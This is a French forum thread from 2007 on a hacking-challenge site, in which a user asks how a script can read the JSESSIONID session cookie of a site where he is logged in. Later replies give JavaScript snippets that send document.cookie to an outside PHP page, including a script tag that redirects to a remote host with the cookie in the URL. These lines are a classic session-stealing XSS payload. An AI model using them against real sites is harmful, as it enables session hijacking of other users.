logo Homepage
+  NewbieContest
|-+  Programmation» Langages Web» [général] problème avec jsessionid
Username:
Password:
Pages: [1]
  Imprimer  
Auteur Fil de discussion: [général] problème avec jsessionid  (Lu 6900 fois)
monfort
Profil challenge

Classement : 18852/54318

Néophyte
*
Hors ligne Hors ligne
Messages: 7


Voir le profil
« le: 27 Mars 2007 à 14:18:25 »

Bonjour,
Alors voila, je cherche à recuperer l'id d'une de mes sessions par un script.
le probleme c'est que cet id est envoyé par un cookie de session (donc pas par un simple cookie)
Je pense qu'il doit etre possible de la recuperer puisque mozilla et IE7 sont capables de me la fournir via l'explorateur de cookie pour mozilla et via IE developer tool bar pour IE7.
Quelqu'un a t il une idée ou est ce tout simplement impossibles?
Merci
Journalisée
zours

Profil challenge

Classement : 553/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #1 le: 27 Mars 2007 à 14:23:35 »

Citation de: monfort
le probleme c'est que cet id est envoyé par un cookie de session (donc pas par un simple cookie)
Tu peux développer ? Je m'attends à quelque chose de pas mal.
Journalisée
monfort
Profil challenge

Classement : 18852/54318

Néophyte
*
Hors ligne Hors ligne
Messages: 7


Voir le profil
« #2 le: 27 Mars 2007 à 14:28:29 »

euh..., d'apres ce que j'ai comprie les cookies de sessions sont stokés en memoire et pas sur le disque mais apparement j'ai pas tout comprie...
Donc si tu pouvais m'eclairer un peu (voir beaucoup) je me sentirais un peu moins c.. .
Merci
Journalisée
Gardel

Profil challenge

Classement : 670/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1012


Voir le profil
« #3 le: 27 Mars 2007 à 16:09:26 »

Un cookie de session, comme tu dis, est un cookie (normal) nommé ganéralement PHPSESSID (nom par défaut dans la configuration de PHP) et contenant un numéro de session.
Ce numéro de session existe aussi en mémoire sur le serveur.
Si tu cherches ton numéro de session, cherche un cookie nommé par exemple PHPSESSID venant de l'hôte que tu veux et regarde sa valeur...
Journalisée

Selon le postulat que les filles, c'est du temps accordé et de l'argent dépensé : Filles = Temps . Argent
Et comme chacun le sait, "le temps c'est de l'argent", donc : Temps = Argent
Par conséquent : Filles = Argent . Argent
Et parce que, "l'argent est la racine du mal" : Argent = sqrt(Mal)
On en déduit que : Filles = sqrt(Mal).sqrt(Mal)
Force est de constater que : Filles = Mal
monfort
Profil challenge

Classement : 18852/54318

Néophyte
*
Hors ligne Hors ligne
Messages: 7


Voir le profil
« #4 le: 27 Mars 2007 à 16:22:39 »

Merci pour t'as reponse mais moi mon cookie en question il s'appelle jsessionid et je ne le trouve pas sur mon disque dur, le seul que je trouve en rapport avec le site s appelle cookiekey mais celui la ne m interesse pas.
Je sais que le jsessionid existe parce que comme je l ai explliqué dans mon premier post je le visualise bien avec IE7 et mozilla.
Alors comment puis je recuperer cet id (par du script)??
Journalisée
Zmx

Profil challenge

Classement : 71/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 559


Voir le profil WWW
« #5 le: 27 Mars 2007 à 16:40:59 »

Citation de: monfort
Merci pour t'as reponse mais moi mon cookie en question il s'appelle jsessionid et je ne le trouve pas sur mon disque dur, le seul que je trouve en rapport avec le site s appelle cookiekey mais celui la ne m interesse pas.
Je sais que le jsessionid existe parce que comme je l ai explliqué dans mon premier post je le visualise bien avec IE7 et mozilla.
Alors comment puis je recuperer cet id (par du script)??
tape dans ton url: javascript:alert(document.cookie)
Journalisée

_o_
Relecteur

Profil challenge

Classement : 42/54318

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #6 le: 27 Mars 2007 à 18:26:34 »

Citation de: monfort
Merci pour t'as reponse mais moi mon cookie en question il s'appelle jsessionid et je ne le trouve pas sur mon disque dur,
Note que firefox a un comportement un peu particulier sur les cookies dont l'expiration est fixée à la fin de la session : il ne les sauvegarde pas sur disque (le fichier cookies.txt ne les contient pas). Par contre, ils sont accessibles par les extensions (au hasard, Add'n Edit Cookies). C'est peut-être un problème dans le genre.

Je ne me prononcerai pas sur le comportement d'Internet Explorer, mais c'est peut-être un comportement normalisé.
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
the lsd
Administrateur

Profil challenge

Classement : 190/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3096

poulping for fun & profit


Voir le profil WWW
« #7 le: 27 Mars 2007 à 21:19:33 »

Ben ils sont sauvegardés où alors ? Dans la mémoire vive ? en cache ?
C'est étonnant ca quand même ! Je ne savais pas !
Et il y a un interet à ne pas les mettre sur le disque ?

Enjoy

The lsd
Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
zours

Profil challenge

Classement : 553/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #8 le: 27 Mars 2007 à 21:22:13 »

Oui : ils expirent à la fin de la session, ils n'auront plus de raison d'être dès qu'on fermera le navigateur. A quoi bon les stocker sur disque, alors.
Journalisée
Mr_KaLiMaN
Relecteur

Profil challenge

Classement : 64/54318

Membre Senior
*
Hors ligne Hors ligne
Messages: 426


Voir le profil WWW
« #9 le: 27 Mars 2007 à 22:34:46 »

Sans vouloir dire trop de conneries, il me semble que dans Mozilla (je ne sais plus quelle version, mais en 2002-2003), les cookies qui expiraient à la fin de la session étaient bien stockés dans le cookie(s).txt jusqu'à la fermeture du Mozilla en question.
A prendre avec précaution...
(Oui, oui je sais ça ne fait pas avancer le schmilblick...)
Journalisée
monfort
Profil challenge

Classement : 18852/54318

Néophyte
*
Hors ligne Hors ligne
Messages: 7


Voir le profil
« #10 le: 28 Mars 2007 à 07:21:49 »

Bonjour,
et merci pour toutes vos reponses, Zmx j'ai bien essayé: javascript:alert(document.cookie) et en effet je retrouve bien mon jsessionid mais mon probleme est plus compliqué.
Je dois m'identifier aupres d'un site, sur ce site il y a un lien externe qui ouvre un script à moi et c'est avec ce script que je voudrais recuperer l'id de la session du site sur lequel je me suis identifier.
J'ai donc essayé window.opener.document.cookie mais j'ai une erreur du style "acces refuse".
Est ce possible à faire? si oui avez vous des idées?
Merci
Journalisée
_o_
Relecteur

Profil challenge

Classement : 42/54318

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #11 le: 28 Mars 2007 à 08:19:15 »

Citation de: Mr_KaLiMaN
Sans vouloir dire trop de conneries, il me semble que dans Mozilla (je ne sais plus quelle version, mais en 2002-2003), les cookies qui expiraient à la fin de la session étaient bien stockés dans le cookie(s).txt jusqu'à la fermeture du Mozilla en question.
C'est possible, mais ce n'est clairement plus le cas. Je fais mes petits shells de telle façon qu'ils attaquent le cookies.txt de mon Firefox pour s'identifier, et ça ne marche pas du tout sur NC, qui invalide ses cookies en fin de session. Heureusement, ça marche sur TBS. \o/
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
Zmx

Profil challenge

Classement : 71/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 559


Voir le profil WWW
« #12 le: 28 Mars 2007 à 09:39:10 »

Citation de: monfort
Bonjour,
et merci pour toutes vos reponses, Zmx j'ai bien essayé: javascript:alert(document.cookie) et en effet je retrouve bien mon jsessionid mais mon probleme est plus compliqué.
Je dois m'identifier aupres d'un site, sur ce site il y a un lien externe qui ouvre un script à moi et c'est avec ce script que je voudrais recuperer l'id de la session du site sur lequel je me suis identifier.
J'ai donc essayé window.opener.document.cookie mais j'ai une erreur du style "acces refuse".
Est ce possible à faire? si oui avez vous des idées?
Merci
Heuresement que tu as un acces refusé ... Vl'a le bordel au niveau de la secu sinon !

Une solution ?

Dans ton liens externe qui ouvre le script (une windows a priroris si tu fait un windows.opener?).
Si oui tu fait ça:
windows.open("tonscript?cookie="+document.cookie);
Dans le script tu recupere ton param via des regexp sur ton windows.location.
Journalisée

monfort
Profil challenge

Classement : 18852/54318

Néophyte
*
Hors ligne Hors ligne
Messages: 7


Voir le profil
« #13 le: 28 Mars 2007 à 09:59:00 »

J'ai essayé ta methode mais j'ai un probleme, c'est que je ne peux pas toucher au code du site qui ouvre mon script, je peux juste tapper l'adresse de mon script dans un formulaire pour qu'il s'execute quand on clique sur un certain bouton.
Mon probleme c'est que le lien n'est pas fais en JS mais en html donc quand je fais:
monscript?cookie=+document.cookie le js n'est pas execute et je recoit simplement document.cookie(logique).
Comment puis je faire executer ce code??

Bon je crois que j'ai trouvé une partie de la solution à mon probleme mais c'est tres moyen:
javascript:window.open("monscript.php?cookie="+window.opener.document.cookie)
J'ai donc deux fenetres qui s'ouvrent une avec rien a l'interieur et l'autre avec mon script.
Y a t-il un moyen de simplifier ce "code"?
Journalisée
Gardel

Profil challenge

Classement : 670/54318

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1012


Voir le profil
« #14 le: 30 Mars 2007 à 16:52:41 »

Hum moi perso sur un site j'ai fais un truc du genre :

<script type="text/javascript">
window.location = "http://monsite.com/pagequirecuperelecookie.php?cookie="+document.cookie;
</script>

Puis le script php au bout peut éventuellement rediriger à nouveau ailleurs...
Journalisée

Selon le postulat que les filles, c'est du temps accordé et de l'argent dépensé : Filles = Temps . Argent
Et comme chacun le sait, "le temps c'est de l'argent", donc : Temps = Argent
Par conséquent : Filles = Argent . Argent
Et parce que, "l'argent est la racine du mal" : Argent = sqrt(Mal)
On en déduit que : Filles = sqrt(Mal).sqrt(Mal)
Force est de constater que : Filles = Mal
Pages: [1]
  Imprimer  
 
Aller à: